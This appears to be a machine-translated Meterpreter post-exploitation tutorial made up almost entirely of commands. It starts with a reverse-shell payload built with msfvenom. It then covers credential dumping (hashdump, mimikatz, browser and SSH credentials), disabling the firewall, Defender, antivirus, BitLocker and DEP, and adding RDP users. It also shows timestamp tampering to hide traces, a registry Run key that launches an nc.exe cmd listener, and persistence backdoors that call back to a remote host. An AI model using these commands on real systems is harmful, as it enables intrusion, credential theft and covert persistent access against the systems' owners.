The post penetration stage is to expand the results after gaining control of the target operating system
First, construct a payload
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe
A machine has been found to execute my payload
Further access to higher permissions.
View basic information
View system information
sysinfo
view user permission
getuid
View network environment
run get_local_subnets
View kernel
uname -a
View version
cat /etc/issue
Information collection module
Some commonly used post modules 1. Judge whether the target machine is a virtual machine
run post/windows/gather/checkvm
2. View the account and token of the target host
run post/windows/gather/credentials/credential_collector
3. View the installed software of the target machine
run post/windows/gather/enum_applications
4. Local right lifting test module
If the authority you get is not the administrator's system authority, and you don't know whether there is a vulnerability of local right lifting, you can choose the following modules for testing
run post/multi/recon/local_exploit_suggester
It will automatically walk through all the vulnerabilities that can be tested, and then list the feasible ones.
5. View recently opened files
run post/windows/gather/dumplinks
6. Check the web application account password for Firefox browser login
Suppose that the target system has Firefox installed and the account password is set to be saved in the browser
run post/multi/gather/firefox_creds
7.ssh save account view
run post/multi/gather/ssh_creds
8. Detect whether a program on the system is malware For example:
run post/multi/gather/check_malware REMOTEFILE=c:\\a.exe
9. Collect password hash on the system (administrator permission is required)
run post/windows/gather/smart_hashdump
10. View the login user of the target machine
run post/windows/gather/enum_logged_on_users
11. Collect the login credentials of the target machine
run post/windows/gather/credentials/credential_collector
12. View the partition of the target machine
run post/windows/gather/forensics/enum_drives
13. Get browser cache file
run post/windows/gather/enum_ie
Information collection script
The collected target machine information will be downloaded locally
run winneum run scraper
General operation
For more command operations, please see the article [1]
Get system permission
getsystem
Get user password hash
The hash value used to obtain the user name and password of the system account
hashdump
Get machine online time
idletime
Target host file search
search command
For example, search all. ini files of the host
search -f *.ini
Searching the whole computer may take a long time, and observing users may notice that their hard disk is constantly bumpy, so search in the specified directory. For example:
search -d c:\\documents\ and\ settings\\administrator\\desktop\\ -f *.pdf
Mimikatz extension
system permission is required
load mimikatz load The new commands are as follows: wdigest kerberos msv ssp tspkg ivessp
These above are related to the account number of the system mimikatz_command -f cannot get help, but it can get the usage method from the error message
View system operation services
mimikatz_command -f service::list
View system processes
mimikatz_command -f process::list
You can get more command prompts through error reporting
Turn off firewall
Premise: the shell that has obtained the administrator permission of the target host through the vulnerability
Use the following command to turn off the firewall
shell netsh advfirewall set allprofiles state off
Check it. It is closed successfully
Further end windend
net stop windefend //netstop is used to end the windows service
View service status under windows Run services.msc with win+r
Add a firewall policy
First enter the command prompt
execute -f cmd -i -H //Open the shell in a hidden way
View firewall status
netsh firewall show opmode
Add an allow policy
netsh firewall add portopening TCP 4444 "test" ENABLE ALL //The name test can be set as a hidden name, which can be extracted from the firewall policy, Achieve the purpose of concealment
Kill antivirus software
Under the command of meterpreter, enter
Run killav
You can also use the post module directly
run post/windows/manage/killav
Turn on Remote Desktop Services
run post/windows/manage/enable_rdp
Use saved scripts
Turn on Remote Desktop Services
run getgui –e
Add remote desktop user and password
run getgui -u user -p pass
Grab screen
screenshot
Or use plug-ins
load espia //Loading plug-ins screengrab //Screen capture
Registry operation
registry
For example: We have obtained the permission of the merterpreter of the target host. By modifying the registry, we will run the nc.exe uploaded to the target host every time the target host starts up, so as to facilitate the monitoring of the target host. 1. Upload nc.exe to the target host
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 //Transferred to the system directory
2. Check the contents of the registry that follow the host startup by default
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run //reg is a special command in merterpreter to view and modify the registry
3. Add a key value
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe' //The setval parameter is to add or modify a key value // -The Ldp L parameter is listening, d means in the background, and p means port // All in all, the unknown key value is added to the registry. The content is to execute nc.exe in the directory, open cmd.exe in the background, listen to port 444 and wait for connection.
View the successful insertion after successful execution.
You can also use the following command
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc // queryval is a query
Additional registry options [2]
Disk encryption
Bitlocker disk encryption. The encrypted files of some computers are encrypted and sealed. Bitlocker encryption is one, which is integrated into the windows system software system.
Turn off disk encryption on the target host:
manage-bde -off C:
To view disk encryption status:
manage-bde -status C:
Close DEP
DEP is a hardware based cpu protection technology. Closing DEPk can easily break the enemy's defense. You can use the following commands
bcdedit.exe /set {current} nx AlwaysOffFile access time modification
When operating on the target system file, the time of file operation will be left, including creation time, modification time and change time. As the name suggests, the system administrator can use the information of these three times to check whether and when the file has been changed and judge whether the system has been invaded.
For penetration testing, of course, we hope to erase the traces of changes. You can use stat - file name to view the details of the file time.
Timestomp Timestamp is a command used by merterpreter to view and modify the change time of a file. View the specific time of the file
timestomp -v 1.txt
Compared with stat command, Entry Modified: 2020-07-22 22:51:39 -0400
Change the MAC time of one file to copy according to the MAC time of another file
timestomp -f c:\\autoexec.bat 1.txt
Time specific modification parameters
-m //Modified time -a //Modify Accessed time -c //Modify Created time -e //Modify Entry Modified time -z //Modify all four times
For example:
timestomp -z "MM/DD/YYYY HH24:MI:SS" 2.txt
AutoRunScript
Generally, payLoad has advanced parameters, in which there is an advanced advanced option.
You can see that there is an AutoRunScript parameter, which is to execute the script immediately after executing the payload.
For example: set AutoRunScript migrate -n explorer.exe This statement means that once you get the shell, immediately migrate the process to explorer.exe to avoid losing the shell after the injected toxic exe is killed.
Or other scripts, for example, view the most recently opened files on the target host immediately
set AutoRunScript post/windows/gather/dumplinks
If there are two scripts in sequence, you can add a script that executes first in the InitialAutoRunScript option.
Modify hosts file
run hostsedit -e 1.1.1.1,www.baidu.com
Persistent back door
metsvc
run metsvc -A // Delete - r
This command will directly generate a system process named metsvc.exe, listening on port 31337 And the boot will start itself, but the disadvantage is that the port cannot be configured by itself, and the name of the uploaded exe file cannot be changed.
Connect the rear door
set PAYLOAD windows/metsvc_bind_tcp set LPORT 31337 set RHOST 1.1.1.1
I haven't got the shell card for a long time. It's estimated that this module won't be maintained
persistence
Check the configuration items of the parameters
-A The default connection method is exploit/multi/handler -S Work on the system as a system service process -X Automatic execution when the system is powered on -i Delay time, when the service is running n Seconds to perform a loopback -p port -r Back connected ip Address, that is kali Address of
Example:
run persistence -X -i 10 -p 4444 -r 1.1.1.1 run persistence -U -i 20 -p 4444 -r 1.1.1.1 run persistence -S -i 20 -p 4444 -r 1.1.1.1
reference material
[1] General operation details:“ https://blog.csdn.net/Yu_csdnstory/article/details/107441171 "
[2] Additional registry details: https://support.accessdata.com/hc/en-us/articles/204448155-Registry-Quick-Find-Chart